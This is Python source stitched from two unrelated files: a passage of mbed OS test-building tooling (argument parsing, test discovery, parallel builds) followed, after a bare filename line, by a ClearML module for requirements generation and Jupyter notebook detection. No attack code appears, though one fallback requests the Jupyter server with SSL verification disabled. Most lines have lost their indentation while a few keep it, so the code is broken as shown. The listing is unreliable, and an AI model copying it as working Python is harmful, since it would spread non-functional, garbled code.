dest='report_junit_file_name',
help='You can log test suite results in form of JUnit compliant XML report')
parser.add_argument("--report-build",
dest="report_build_file_name",
help="Output the build results to a junit xml file")
parser.add_argument("--report-text",
dest="report_text_file_name",
help="Output the build results to a text file")
parser.add_argument('--verbose-skipped',
dest='verbose_skipped_tests',
default=False,
action="store_true",
help='Prints some extra information about skipped tests')
parser.add_argument('-V', '--verbose-test-result',
dest='verbose_test_result_only',
default=False,
action="store_true",
help='Prints test serial output')
parser.add_argument('-v', '--verbose',
dest='verbose',
default=False,
action="store_true",
help='Verbose mode (prints some extra information)')
parser.add_argument('--version',
dest='version',
default=False,
action="store_true",
help='Prints script version and exits')
parser.add_argument('--stats-depth',
dest='stats_depth',
default=2,
type=int,
help="Depth level for static memory report")
return parser
def test_path_to_name(path, base):
"""Change all slashes in a path into hyphens
This creates a unique cross-platform test name based on the path
    This can eventually be overridden by a to-be-determined meta-data mechanism"""
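    # Example (POSIX paths): test_path_to_name('TESTS/network/tcp_echo', 'TESTS') returns 'network-tcp_echo'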
name_parts = []
head, tail = os.path.split(relpath(path,base))
while (tail and tail != "."):
name_parts.insert(0, tail)
head, tail = os.path.split(head)
return "-".join(name_parts).lower()
def get_test_config(config_name, target_name):
"""Finds the path to a test configuration file
config_name: path to a custom configuration file OR mbed OS interface "ethernet, wifi_odin, etc"
    target_name: name of target to determine if the mbed OS interface given is valid
returns path to config, will return None if no valid config is found
"""
# If they passed in a full path
if exists(config_name):
# This is a module config
return config_name
# Otherwise find the path to configuration file based on mbed OS interface
return TestConfig.get_config_path(config_name, target_name)
def find_tests(base_dir, target_name, toolchain_name, app_config=None):
""" Finds all tests in a directory recursively
base_dir: path to the directory to scan for tests (ex. 'path/to/project')
target_name: name of the target to use for scanning (ex. 'K64F')
toolchain_name: name of the toolchain to use for scanning (ex. 'GCC_ARM')
options: Compile options to pass to the toolchain (ex. ['debug-info'])
app_config - location of a chosen mbed_app.json file
returns a dictionary where keys are the test name, and the values are
    lists of paths needed to build the test.
"""
# Temporary structure: tests referenced by (name, base, group, case) tuple
tests = {}
# List of common folders: (predicate function, path) tuple
commons = []
# Prepare the toolchain
toolchain = prepare_toolchain([base_dir], None, target_name, toolchain_name,
silent=True, app_config=app_config)
# Scan the directory for paths to probe for 'TESTS' folders
base_resources = scan_resources([base_dir], toolchain)
dirs = base_resources.inc_dirs
for directory in dirs:
subdirs = os.listdir(directory)
# If the directory contains a subdirectory called 'TESTS', scan it for test cases
if 'TESTS' in subdirs:
walk_base_dir = join(directory, 'TESTS')
test_resources = toolchain.scan_resources(walk_base_dir, base_path=base_dir)
# Loop through all subdirectories
for d in test_resources.inc_dirs:
# If the test case folder is not called 'host_tests' or 'COMMON' and it is
# located two folders down from the main 'TESTS' folder (ex. TESTS/testgroup/testcase)
# then add it to the tests
relative_path = relpath(d, walk_base_dir)
relative_path_parts = os.path.normpath(relative_path).split(os.sep)
if len(relative_path_parts) == 2:
test_group_directory_path, test_case_directory = os.path.split(d)
test_group_directory = os.path.basename(test_group_directory_path)
                    # Check to make sure the discovered folder is not in a host test directory or common directory
special_dirs = ['host_tests', 'COMMON']
if test_group_directory not in special_dirs and test_case_directory not in special_dirs:
test_name = test_path_to_name(d, base_dir)
tests[(test_name, walk_base_dir, test_group_directory, test_case_directory)] = [d]
# Also find any COMMON paths, we'll add these later once we find all the base tests
if 'COMMON' in relative_path_parts:
if relative_path_parts[0] != 'COMMON':
                        def predicate(base_pred, group_pred, test_identity):
                            # unpack the identity tuple inside the function (Python 3 compatible)
                            name, base, group, case = test_identity
                            return base == base_pred and group == group_pred
                        commons.append((functools.partial(predicate, walk_base_dir, relative_path_parts[0]), d))
                    else:
                        def predicate(base_pred, test_identity):
                            name, base, group, case = test_identity
                            return base == base_pred
                        commons.append((functools.partial(predicate, walk_base_dir), d))
# Apply common directories
for pred, path in commons:
        for test_identity, test_paths in tests.items():
if pred(test_identity):
test_paths.append(path)
# Drop identity besides name
    return {name: paths for (name, _, _, _), paths in tests.items()}
def print_tests(tests, format="list", sort=True):
"""Given a dictionary of tests (as returned from "find_tests"), print them
in the specified format"""
if format == "list":
for test_name in sorted(tests.keys()):
test_path = tests[test_name][0]
print("Test Case:")
print(" Name: %s" % test_name)
print(" Path: %s" % test_path)
elif format == "json":
        print(json.dumps({test_name: test_paths[0] for test_name, test_paths
                          in tests.items()}, indent=2))
else:
print("Unknown format '%s'" % format)
sys.exit(1)
def norm_relative_path(path, start):
"""This function will create a normalized, relative path. It mimics the
    python os.path.relpath function, but also normalizes a Windows-style path
    that uses backslashes to a Unix-style path that uses forward slashes."""
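    # Example: norm_relative_path('/work/proj/BUILD/./tests', '/work/proj') returns 'BUILD/tests'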
path = os.path.normpath(path)
path = os.path.relpath(path, start)
path = path.replace("\\", "/")
return path
def build_test_worker(*args, **kwargs):
"""This is a worker function for the parallel building of tests. The `args`
and `kwargs` are passed directly to `build_project`. It returns a dictionary
with the following structure:
{
'result': `True` if no exceptions were thrown, `False` otherwise
'reason': Instance of exception that was thrown on failure
'bin_file': Path to the created binary if `build_project` was
successful. Not present otherwise
'kwargs': The keyword arguments that were passed to `build_project`.
This includes arguments that were modified (ex. report)
}
"""
bin_file = None
ret = {
'result': False,
'args': args,
'kwargs': kwargs
}
# Use parent TOOLCHAIN_PATHS variable
for key, value in kwargs['toolchain_paths'].items():
TOOLCHAIN_PATHS[key] = value
del kwargs['toolchain_paths']
try:
bin_file = build_project(*args, **kwargs)
ret['result'] = True
ret['bin_file'] = bin_file
ret['kwargs'] = kwargs
except NotSupportedException as e:
ret['reason'] = e
except ToolException as e:
ret['reason'] = e
except KeyboardInterrupt as e:
ret['reason'] = e
except:
# Print unhandled exceptions here
import traceback
traceback.print_exc(file=sys.stdout)
return ret
def build_tests(tests, base_source_paths, build_path, target, toolchain_name,
clean=False, notify=None, verbose=False, jobs=1, macros=None,
silent=False, report=None, properties=None,
continue_on_build_fail=False, app_config=None,
build_profile=None, stats_depth=None):
"""Given the data structure from 'find_tests' and the typical build parameters,
build all the tests
Returns a tuple of the build result (True or False) followed by the test
build data structure"""
execution_directory = "."
base_path = norm_relative_path(build_path, execution_directory)
target_name = target.name if isinstance(target, Target) else target
cfg, _, _ = get_config(base_source_paths, target_name, toolchain_name, app_config=app_config)
baud_rate = 9600
if 'platform.stdio-baud-rate' in cfg:
baud_rate = cfg['platform.stdio-baud-rate'].value
test_build = {
"platform": target_name,
"toolchain": toolchain_name,
"base_path": base_path,
"baud_rate": baud_rate,
"binary_type": "bootable",
"tests": {}
}
result = True
jobs_count = int(jobs if jobs else cpu_count())
p = Pool(processes=jobs_count)
results = []
for test_name, test_paths in tests.items():
if not isinstance(test_paths, list):
test_paths = [test_paths]
test_build_path = os.path.join(build_path, test_paths[0])
src_paths = base_source_paths + test_paths
bin_file = None
test_case_folder_name = os.path.basename(test_paths[0])
args = (src_paths, test_build_path, target, toolchain_name)
kwargs = {
'jobs': 1,
'clean': clean,
'macros': macros,
'name': test_case_folder_name,
'project_id': test_name,
'report': report,
'properties': properties,
'verbose': verbose,
'app_config': app_config,
'build_profile': build_profile,
'silent': True,
'toolchain_paths': TOOLCHAIN_PATHS,
'stats_depth': stats_depth
}
results.append(p.apply_async(build_test_worker, args, kwargs))
p.close()
result = True
itr = 0
while len(results):
itr += 1
if itr > 360000:
p.terminate()
p.join()
raise ToolException("Compile did not finish in 10 minutes")
else:
sleep(0.01)
pending = 0
for r in results:
if r.ready() is True:
try:
worker_result = r.get()
results.remove(r)
# Take report from the kwargs and merge it into existing report
if report:
report_entry = worker_result['kwargs']['report'][target_name][toolchain_name]
for test_key in report_entry.keys():
report[target_name][toolchain_name][test_key] = report_entry[test_key]
# Set the overall result to a failure if a build failure occurred
                    if ('reason' in worker_result and
                            worker_result['reason'] and
                            not isinstance(worker_result['reason'], NotSupportedException)):
result = False
break
# Adding binary path to test build result
if ('result' in worker_result and
worker_result['result'] and
'bin_file' in worker_result):
bin_file = norm_relative_path(worker_result['bin_file'], execution_directory)
test_build['tests'][worker_result['kwargs']['project_id']] = {
"binaries": [
{
"path": bin_file
}
]
}
test_key = worker_result['kwargs']['project_id'].upper()
if report:
print(report[target_name][toolchain_name][test_key][0][0]['output'].rstrip())
print('Image: %s\n' % bin_file)
except:
if p._taskqueue.queue:
p._taskqueue.queue.clear()
sleep(0.5)
p.terminate()
p.join()
raise
else:
pending += 1
if pending >= jobs_count:
break
# Break as soon as possible if there is a failure and we are not
# continuing on build failures
if not result and not continue_on_build_fail:
if p._taskqueue.queue:
p._taskqueue.queue.clear()
sleep(0.5)
p.terminate()
break
p.join()
test_builds = {}
test_builds["%s-%s" % (target_name, toolchain_name)] = test_build
return result, test_builds
def test_spec_from_test_builds(test_builds):
return {
"builds": test_builds
}
scriptinfo.py
import os
import sys
from copy import copy
from datetime import datetime
from functools import partial
from tempfile import mkstemp, gettempdir
import attr
import logging
import json
from pathlib2 import Path
from threading import Thread, Event
from .util import get_command_output, remove_user_pass_from_url
from ....backend_api import Session
from ....config import deferred_config, VCS_WORK_DIR
from ....debugging import get_logger
from .detectors import GitEnvDetector, GitDetector, HgEnvDetector, HgDetector, Result as DetectionResult
class ScriptInfoError(Exception):
pass
class ScriptRequirements(object):
_detailed_import_report = deferred_config('development.detailed_import_report', False)
_max_requirements_size = 512 * 1024
_packages_remove_version = ('setuptools', )
_ignore_packages = set()
@classmethod
def _get_logger(cls):
return get_logger("Repository Detection")
def __init__(self, root_folder):
self._root_folder = root_folder
def get_requirements(self, entry_point_filename=None, add_missing_installed_packages=False,
detailed_req_report=None):
# noinspection PyBroadException
try:
from ....utilities.pigar.reqs import get_installed_pkgs_detail
from ....utilities.pigar.__main__ import GenerateReqs
installed_pkgs = self._remove_package_versions(
get_installed_pkgs_detail(), self._packages_remove_version)
gr = GenerateReqs(save_path='', project_path=self._root_folder, installed_pkgs=installed_pkgs,
ignores=['.git', '.hg', '.idea', '__pycache__', '.ipynb_checkpoints',
'site-packages', 'dist-packages'])
reqs, try_imports, guess, local_pks = gr.extract_reqs(
module_callback=ScriptRequirements.add_trains_used_packages, entry_point_filename=entry_point_filename)
if add_missing_installed_packages and guess:
for k in guess:
if k not in reqs:
reqs[k] = guess[k]
return self.create_requirements_txt(reqs, local_pks, detailed=detailed_req_report)
except Exception as ex:
self._get_logger().warning("Failed auto-generating package requirements: {}".format(ex))
return '', ''
@staticmethod
def add_trains_used_packages(modules):
# hack: forcefully insert storage modules if we have them
# noinspection PyBroadException
try:
# noinspection PyPackageRequirements,PyUnresolvedReferences
import boto3 # noqa: F401
modules.add('boto3', 'clearml.storage', 0)
except Exception:
pass
# noinspection PyBroadException
try:
# noinspection PyPackageRequirements,PyUnresolvedReferences
from google.cloud import storage # noqa: F401
modules.add('google_cloud_storage', 'clearml.storage', 0)
except Exception:
pass
# noinspection PyBroadException
try:
# noinspection PyPackageRequirements,PyUnresolvedReferences
from azure.storage.blob import ContentSettings # noqa: F401
modules.add('azure_storage_blob', 'clearml.storage', 0)
except Exception:
pass
# bugfix, replace sklearn with scikit-learn name
if 'sklearn' in modules:
sklearn = modules.pop('sklearn', {})
for fname, lines in sklearn.items():
modules.add('scikit_learn', fname, lines)
# if we have torch and it supports tensorboard, we should add that as well
# (because it will not be detected automatically)
if 'torch' in modules and 'tensorboard' not in modules and 'tensorboardX' not in modules:
# noinspection PyBroadException
try:
# see if this version of torch support tensorboard
# noinspection PyPackageRequirements,PyUnresolvedReferences
import torch.utils.tensorboard # noqa: F401
# noinspection PyPackageRequirements,PyUnresolvedReferences
import tensorboard # noqa: F401
modules.add('tensorboard', 'torch', 0)
except Exception:
pass
# remove setuptools, we should not specify this module version. It is installed by default
if 'setuptools' in modules:
modules.pop('setuptools', {})
# add forced requirements:
# noinspection PyBroadException
try:
from ..task import Task
# noinspection PyProtectedMember
for package, version in Task._force_requirements.items():
modules.add(package, 'clearml', 0)
except Exception:
pass
return modules
@staticmethod
def create_requirements_txt(reqs, local_pks=None, detailed=None):
# write requirements.txt
if detailed is None:
detailed = ScriptRequirements._detailed_import_report
# noinspection PyBroadException
try:
conda_requirements = ''
conda_prefix = os.environ.get('CONDA_PREFIX')
if conda_prefix and not conda_prefix.endswith(os.path.sep):
conda_prefix += os.path.sep
if conda_prefix and sys.executable.startswith(conda_prefix):
conda_packages_json = get_command_output(['conda', 'list', '--json'])
conda_packages_json = json.loads(conda_packages_json)
reqs_lower = {k.lower(): (k, v) for k, v in reqs.items()}
for r in conda_packages_json:
# the exception is cudatoolkit which we want to log anyhow
if r.get('name') == 'cudatoolkit' and r.get('version'):
conda_requirements += '{0} {1} {2}\n'.format(r.get('name'), '==', r.get('version'))
continue
# check if this is a pypi package, if it is, leave it outside
if not r.get('channel') or r.get('channel') == 'pypi':
continue
# check if we have it in our required packages
name = r['name'].lower()
# hack support pytorch/torch different naming convention
if name == 'pytorch':
name = 'torch'
k, v = None, None
if name in reqs_lower:
k, v = reqs_lower.get(name, (None, None))
else:
name = name.replace('-', '_')
if name in reqs_lower:
k, v = reqs_lower.get(name, (None, None))
if k and v is not None:
if v.version:
conda_requirements += '{0} {1} {2}\n'.format(k, '==', v.version)
else:
conda_requirements += '{0}\n'.format(k)
except Exception:
conda_requirements = ''
# add forced requirements:
forced_packages = {}
ignored_packages = ScriptRequirements._ignore_packages
# noinspection PyBroadException
try:
from ..task import Task
# noinspection PyProtectedMember
forced_packages = copy(Task._force_requirements)
# noinspection PyProtectedMember
ignored_packages = Task._ignore_requirements | ignored_packages
except Exception:
pass
# python version header
requirements_txt = '# Python ' + sys.version.replace('\n', ' ').replace('\r', ' ') + '\n'
if local_pks:
requirements_txt += '\n# Local modules found - skipping:\n'
for k, v in local_pks.sorted_items():
if v.version:
requirements_txt += '# {0} == {1}\n'.format(k, v.version)
else:
requirements_txt += '# {0}\n'.format(k)
# requirement summary
requirements_txt += '\n'
for k, v in reqs.sorted_items():
if k in ignored_packages or k.lower() in ignored_packages:
continue
version = v.version if v else None
if k in forced_packages:
forced_version = forced_packages.pop(k, None)
if forced_version is not None:
version = forced_version
# requirements_txt += ''.join(['# {0}\n'.format(c) for c in v.comments.sorted_items()])
requirements_txt += ScriptRequirements._make_req_line(k, version or None)
# add forced requirements that we could not find installed on the system
for k in sorted(forced_packages.keys()):
requirements_txt += ScriptRequirements._make_req_line(k, forced_packages.get(k))
requirements_txt_packages_only = requirements_txt
if detailed:
requirements_txt_packages_only = \
requirements_txt + '\n# Skipping detailed import analysis, it is too large\n'
# requirements details (in comments)
requirements_txt += '\n' + \
'# Detailed import analysis\n' \
'# **************************\n'
if local_pks:
for k, v in local_pks.sorted_items():
requirements_txt += '\n'
requirements_txt += '# IMPORT LOCAL PACKAGE {0}\n'.format(k)
requirements_txt += ''.join(['# {0}\n'.format(c) for c in v.comments.sorted_items()])
for k, v in reqs.sorted_items():
if not v:
continue
requirements_txt += '\n'
if k == '-e':
requirements_txt += '# IMPORT PACKAGE {0} {1}\n'.format(k, v.version)
else:
requirements_txt += '# IMPORT PACKAGE {0}\n'.format(k)
requirements_txt += ''.join(['# {0}\n'.format(c) for c in v.comments.sorted_items()])
        # make sure we do not exceed the size limit
return (requirements_txt if len(requirements_txt) < ScriptRequirements._max_requirements_size
else requirements_txt_packages_only,
conda_requirements)
@staticmethod
def _make_req_line(k, version):
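        # Examples (hypothetical values): _make_req_line('numpy', '1.21.0') returns 'numpy == 1.21.0\n',
        # while _make_req_line('-e', 'git+https://example.com/repo.git') returns just the URL line.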
requirements_txt = ''
if k == '-e' and version:
requirements_txt += '{0}\n'.format(version)
elif k.startswith('-e '):
requirements_txt += '{0} {1}\n'.format(k.replace('-e ', '', 1), version or '')
elif version and str(version or ' ').strip()[0].isdigit():
requirements_txt += '{0} {1} {2}\n'.format(k, '==', version)
elif version and str(version).strip():
requirements_txt += '{0} {1}\n'.format(k, version)
else:
requirements_txt += '{0}\n'.format(k)
return requirements_txt
@staticmethod
def _remove_package_versions(installed_pkgs, package_names_to_remove_version):
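        # Example (hypothetical version): with package_names_to_remove_version = ('setuptools',),
        # an entry {'setuptools': ('setuptools', '65.5.0')} becomes {'setuptools': ('setuptools', None)}.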
installed_pkgs = {k: (v[0], None if str(k) in package_names_to_remove_version else v[1])
for k, v in installed_pkgs.items()}
return installed_pkgs
class _JupyterObserver(object):
_thread = None
_exit_event = Event()
_sync_event = Event()
_sample_frequency = 30.
_first_sample_frequency = 3.
_jupyter_history_logger = None
_store_notebook_artifact = deferred_config('development.store_jupyter_notebook_artifact', True)
@classmethod
def _get_logger(cls):
return get_logger("Repository Detection")
@classmethod
def observer(cls, jupyter_notebook_filename, log_history):
if cls._thread is not None:
# order of signaling is important!
cls._exit_event.set()
cls._sync_event.set()
cls._thread.join()
if log_history and cls._jupyter_history_logger is None:
cls._jupyter_history_logger = _JupyterHistoryLogger()
cls._jupyter_history_logger.hook()
cls._sync_event.clear()
cls._exit_event.clear()
cls._thread = Thread(target=cls._daemon, args=(jupyter_notebook_filename, ))
cls._thread.daemon = True
cls._thread.start()
@classmethod
def signal_sync(cls, *_, **__):
cls._sync_event.set()
@classmethod
def close(cls):
if not cls._thread:
return
cls._exit_event.set()
cls._sync_event.set()
cls._thread.join()
cls._thread = None
@classmethod
def _daemon(cls, jupyter_notebook_filename):
from clearml import Task
# load jupyter notebook package
# noinspection PyBroadException
try:
# noinspection PyPackageRequirements
from nbconvert.exporters.script import ScriptExporter
_script_exporter = ScriptExporter()
except Exception as ex:
cls._get_logger().warning('Could not read Jupyter Notebook: {}'.format(ex))
return
# load pigar
# noinspection PyBroadException
try:
from ....utilities.pigar.reqs import get_installed_pkgs_detail, file_import_modules
from ....utilities.pigar.modules import ReqsModules
from ....utilities.pigar.log import logger
logger.setLevel(logging.WARNING)
except Exception:
file_import_modules = None
# load IPython
# noinspection PyBroadException
try:
# noinspection PyPackageRequirements
from IPython import get_ipython
except Exception:
# should not happen
get_ipython = None
# setup local notebook files
if jupyter_notebook_filename:
notebook = Path(jupyter_notebook_filename)
local_jupyter_filename = jupyter_notebook_filename
else:
notebook = None
fd, local_jupyter_filename = mkstemp(suffix='.ipynb')
os.close(fd)
last_update_ts = None
counter = 0
prev_script_hash = None
# noinspection PyBroadException
try:
from ....version import __version__
our_module = cls.__module__.split('.')[0], __version__
except Exception:
our_module = None
# noinspection PyBroadException
try:
import re
replace_ipython_pattern = re.compile(r'\n([ \t]*)get_ipython\(\)')
replace_ipython_display_pattern = re.compile(r'\n([ \t]*)display\(')
except Exception:
replace_ipython_pattern = None
replace_ipython_display_pattern = None
# main observer loop, check if we need to exit
while not cls._exit_event.wait(timeout=0.):
# wait for timeout or sync event
cls._sync_event.wait(cls._sample_frequency if counter else cls._first_sample_frequency)
cls._sync_event.clear()
counter += 1
# noinspection PyBroadException
try:
# if there is no task connected, do nothing
task = Task.current_task()
if not task:
continue
script_code = None
fmodules = None
current_cell = None
# if we have a local file:
if notebook:
if not notebook.exists():
continue
# check if notebook changed
if last_update_ts is not None and notebook.stat().st_mtime - last_update_ts <= 0:
continue
last_update_ts = notebook.stat().st_mtime
else:
# serialize notebook to a temp file
if cls._jupyter_history_logger:
script_code, current_cell = cls._jupyter_history_logger.history_to_str()
else:
# noinspection PyBroadException
try:
# noinspection PyBroadException
try:
os.unlink(local_jupyter_filename)
except Exception:
pass
get_ipython().run_line_magic('history', '-t -f {}'.format(local_jupyter_filename))
with open(local_jupyter_filename, 'r') as f:
script_code = f.read()
# load the modules
from ....utilities.pigar.modules import ImportedModules
fmodules = ImportedModules()
for nm in set([str(m).split('.')[0] for m in sys.modules]):
fmodules.add(nm, 'notebook', 0)
except Exception:
continue
# get notebook python script
if script_code is None and local_jupyter_filename:
script_code, _ = _script_exporter.from_filename(local_jupyter_filename)
if cls._store_notebook_artifact:
# also upload the jupyter notebook as artifact
task.upload_artifact(
name='notebook',
artifact_object=Path(local_jupyter_filename),
preview='See `notebook preview` artifact',
metadata={'UPDATE': datetime.utcnow().strftime('%Y-%m-%d %H:%M:%S')},
wait_on_upload=True,
)
# noinspection PyBroadException
try:
from nbconvert.exporters import HTMLExporter # noqa
html, _ = HTMLExporter().from_filename(filename=local_jupyter_filename)
local_html = Path(gettempdir()) / 'notebook_{}.html'.format(task.id)
with open(local_html.as_posix(), 'wt', encoding="utf-8") as f:
f.write(html)
task.upload_artifact(
name='notebook preview', artifact_object=local_html,
preview='Click `FILE PATH` link',
metadata={'UPDATE': datetime.utcnow().strftime('%Y-%m-%d %H:%M:%S')},
delete_after_upload=True,
wait_on_upload=True,
)
except Exception:
pass
current_script_hash = hash(script_code + (current_cell or ''))
if prev_script_hash and prev_script_hash == current_script_hash:
continue
# remove ipython direct access from the script code
# we will not be able to run them anyhow
if replace_ipython_pattern:
script_code = replace_ipython_pattern.sub(r'\n# \g<1>get_ipython()', script_code)
if replace_ipython_display_pattern:
script_code = replace_ipython_display_pattern.sub(r'\n\g<1>print(', script_code)
requirements_txt = ''
conda_requirements = ''
# parse jupyter python script and prepare pip requirements (pigar)
# if backend supports requirements
if file_import_modules and Session.check_min_api_version('2.2'):
if fmodules is None:
fmodules, _ = file_import_modules(
notebook.parts[-1] if notebook else 'notebook', script_code)
if current_cell:
cell_fmodules, _ = file_import_modules(
notebook.parts[-1] if notebook else 'notebook', current_cell)
# noinspection PyBroadException
try:
fmodules |= cell_fmodules
except Exception:
pass
# add current cell to the script
if current_cell:
script_code += '\n' + current_cell
fmodules = ScriptRequirements.add_trains_used_packages(fmodules)
# noinspection PyUnboundLocalVariable
installed_pkgs = get_installed_pkgs_detail()
# make sure we are in installed packages
if our_module and (our_module[0] not in installed_pkgs):
installed_pkgs[our_module[0]] = our_module
# noinspection PyUnboundLocalVariable
reqs = ReqsModules()
for name in fmodules:
if name in installed_pkgs:
pkg_name, version = installed_pkgs[name]
reqs.add(pkg_name, version, fmodules[name])
requirements_txt, conda_requirements = ScriptRequirements.create_requirements_txt(reqs)
# update script
prev_script_hash = current_script_hash
data_script = task.data.script
data_script.diff = script_code
data_script.requirements = {'pip': requirements_txt, 'conda': conda_requirements}
# noinspection PyProtectedMember
task._update_script(script=data_script)
# update requirements
# noinspection PyProtectedMember
task._update_requirements(requirements=requirements_txt)
except Exception:
pass
class ScriptInfo(object):
max_diff_size_bytes = 500000
plugins = [GitEnvDetector(), HgEnvDetector(), HgDetector(), GitDetector()]
""" Script info detection plugins, in order of priority """
@classmethod
def _get_logger(cls):
return get_logger("Repository Detection")
@classmethod
def _jupyter_install_post_store_hook(cls, jupyter_notebook_filename, log_history=False):
# noinspection PyBroadException
try:
if 'IPython' in sys.modules:
# noinspection PyPackageRequirements
from IPython import get_ipython
if get_ipython():
_JupyterObserver.observer(jupyter_notebook_filename, log_history)
get_ipython().events.register('pre_run_cell', _JupyterObserver.signal_sync)
if log_history:
get_ipython().events.register('post_run_cell', _JupyterObserver.signal_sync)
except Exception:
pass
@classmethod
def _get_jupyter_notebook_filename(cls):
# check if we are running in vscode, we have the jupyter notebook defined:
if 'IPython' in sys.modules:
# noinspection PyBroadException
try:
from IPython import get_ipython # noqa
ip = get_ipython()
# vscode-jupyter PR #8531 added this variable
local_ipynb_file = ip.__dict__.get('user_ns', {}).get('__vsc_ipynb_file__') if ip else None
if local_ipynb_file:
# now replace the .ipynb with .py
# we assume we will have that file available for monitoring
local_ipynb_file = Path(local_ipynb_file)
script_entry_point = local_ipynb_file.with_suffix('.py').as_posix()
# install the post store hook,
# notice that if we do not have a local file we serialize/write every time the entire notebook
cls._jupyter_install_post_store_hook(local_ipynb_file.as_posix(), log_history=False)
return script_entry_point
except Exception:
pass
if not (sys.argv[0].endswith(os.path.sep + 'ipykernel_launcher.py') or
sys.argv[0].endswith(os.path.join(os.path.sep, 'ipykernel', '__main__.py'))) \
or len(sys.argv) < 3 or not sys.argv[2].endswith('.json'):
return None
server_info = None
# we can safely assume that we can import the notebook package here
# noinspection PyBroadException
try:
# noinspection PyPackageRequirements
from notebook.notebookapp import list_running_servers
import requests
current_kernel = sys.argv[2].split(os.path.sep)[-1].replace('kernel-', '').replace('.json', '')
# noinspection PyBroadException
try:
server_info = next(list_running_servers())
except Exception:
# on some jupyter notebook versions this function can crash on parsing the json file,
# we will parse it manually here
# noinspection PyPackageRequirements
import ipykernel
from glob import glob
import json
for f in glob(os.path.join(os.path.dirname(ipykernel.get_connection_file()), '??server-*.json')):
# noinspection PyBroadException
try:
with open(f, 'r') as json_data:
server_info = json.load(json_data)
except Exception:
server_info = None
if server_info:
break
cookies = None
password = None
if server_info and server_info.get('password'):
# we need to get the password
from ....config import config
password = config.get('development.jupyter_server_password', '')
if not password:
cls._get_logger().warning(
'Password protected Jupyter Notebook server was found! '
'Add `sdk.development.jupyter_server_password=<jupyter_password>` to ~/clearml.conf')
return os.path.join(os.getcwd(), 'error_notebook_not_found.py')
r = requests.get(url=server_info['url'] + 'login')
cookies = {'_xsrf': r.cookies.get('_xsrf', '')}
r = requests.post(server_info['url'] + 'login?next', cookies=cookies,
data={'_xsrf': cookies['_xsrf'], 'password': password})
cookies.update(r.cookies)
auth_token = server_info.get('token') or os.getenv('JUPYTERHUB_API_TOKEN') or ''
try:
r = requests.get(
url=server_info['url'] + 'api/sessions', cookies=cookies,
headers={'Authorization': 'token {}'.format(auth_token), })
except requests.exceptions.SSLError:
# disable SSL check warning
from urllib3.exceptions import InsecureRequestWarning
# noinspection PyUnresolvedReferences
requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)
# fire request
r = requests.get(
url=server_info['url'] + 'api/sessions', cookies=cookies,
headers={'Authorization': 'token {}'.format(auth_token), }, verify=False)
# enable SSL check warning
import warnings
warnings.simplefilter('default', InsecureRequestWarning)
# send request to the jupyter server
try:
r.raise_for_status()
except Exception as ex:
cls._get_logger().warning('Failed accessing the jupyter server{}: {}'.format(
' [password={}]'.format(password) if server_info.get('password') else '', ex))
return os.path.join(os.getcwd(), 'error_notebook_not_found.py')
notebooks = r.json()
cur_notebook = None
for n in notebooks:
if n['kernel']['id'] == current_kernel:
cur_notebook = n
break
notebook_path = cur_notebook['notebook'].get('path', '')
notebook_name = cur_notebook['notebook'].get('name', '')
is_google_colab = False
# check if this is google.colab, then there is no local file
# noinspection PyBroadException
try:
# noinspection PyPackageRequirements
from IPython import get_ipython
if get_ipython() and 'google.colab' in get_ipython().extension_manager.loaded:
is_google_colab = True
except Exception:
pass
if is_google_colab:
script_entry_point = str(notebook_name or 'notebook').replace(
'>', '_').replace('<', '_').replace('.ipynb', '.py')
if not script_entry_point.lower().endswith('.py'):
script_entry_point += '.py'
local_ipynb_file = None
else:
# always slash, because this is from uri (so never backslash not even on windows)
entry_point_filename = notebook_path.split('/')[-1]
# now we should try to find the actual file
entry_point = (Path.cwd() / entry_point_filename).absolute()
if not entry_point.is_file():
entry_point = (Path.cwd() / notebook_path).absolute()
# fix for VSCode pushing uuid at the end of the notebook name.
if not entry_point.exists():
# noinspection PyBroadException
try:
alternative_entry_point = '-'.join(entry_point_filename.split('-')[:-5])+'.ipynb'
# now we should try to find the actual file
entry_point_alternative = (Path.cwd() / alternative_entry_point).absolute()
                        if not entry_point_alternative.is_file():
                            entry_point_alternative = (Path.cwd() / notebook_path).absolute()
# If we found it replace it
if entry_point_alternative.exists():
entry_point = entry_point_alternative
except Exception as ex:
cls._get_logger().warning('Failed accessing jupyter notebook {}: {}'.format(notebook_path, ex))
# get local ipynb for observer
local_ipynb_file = entry_point.as_posix()
# now replace the .ipynb with .py
# we assume we will have that file available with the Jupyter notebook plugin
entry_point = entry_point.with_suffix('.py')
script_entry_point = entry_point.as_posix()
            # install the post store hook;
            # notice that if we do not have a local file we serialize/write the entire notebook every time
cls._jupyter_install_post_store_hook(local_ipynb_file, is_google_colab)
return script_entry_point
except Exception:
return None
@classmethod
def _get_entry_point(cls, repo_root, script_path):
repo_root = Path(repo_root).absolute()
try:
# Use os.path.relpath as it calculates up dir movements (../)
entry_point = os.path.relpath(
str(script_path), str(cls._get_working_dir(repo_root, return_abs=True)))
except ValueError:
# Working directory not under repository root
entry_point = script_path.relative_to(repo_root)
return Path(entry_point).as_posix()
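    # Illustration (hypothetical paths, not from any real run): with a repo root of
    # '/home/user/repo', a working dir of '/home/user/repo/src' and a script at
    # '/home/user/repo/tools/run.py', os.path.relpath() yields '../tools/run.py',
    # whereas Path.relative_to() would raise ValueError; that is why relpath is preferred above.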
@classmethod
def _cwd(cls):
# return the current working directory (solve for hydra changing it)
# check if running with hydra
if sys.modules.get('hydra'):
# noinspection PyBroadException
try:
# noinspection PyPackageRequirements
import hydra # noqa
return Path(hydra.utils.get_original_cwd()).absolute()
except Exception:
pass
return Path.cwd().absolute()
@classmethod
def _get_working_dir(cls, repo_root, return_abs=False):
# get the repository working directory (might be different from actual cwd)
repo_root = Path(repo_root).absolute()
cwd = cls._cwd()
try:
# do not change: test if we are under the repo root folder, it will throw an exception if we are not
relative = cwd.relative_to(repo_root).as_posix()
return cwd.as_posix() if return_abs else relative
except ValueError:
# Working directory not under repository root, default to repo root
return repo_root.as_posix() if return_abs else '.'
@classmethod
def _absolute_path(cls, file_path, cwd):
# return the absolute path, relative to a specific working directory (cwd)
file_path = Path(file_path)
if file_path.is_absolute():
return file_path.as_posix()
# Convert to absolute and squash 'path/../folder'
return os.path.abspath((Path(cwd).absolute() / file_path).as_posix())
@classmethod
def _get_script_code(cls, script_path):
# noinspection PyBroadException
try:
with open(script_path, 'r') as f:
script_code = f.read()
return script_code
except Exception:
pass
return ''
@classmethod
def _get_script_info(
cls, filepaths, check_uncommitted=True, create_requirements=True, log=None,
uncommitted_from_remote=False, detect_jupyter_notebook=True,
add_missing_installed_packages=False, detailed_req_report=None, force_single_script=False):
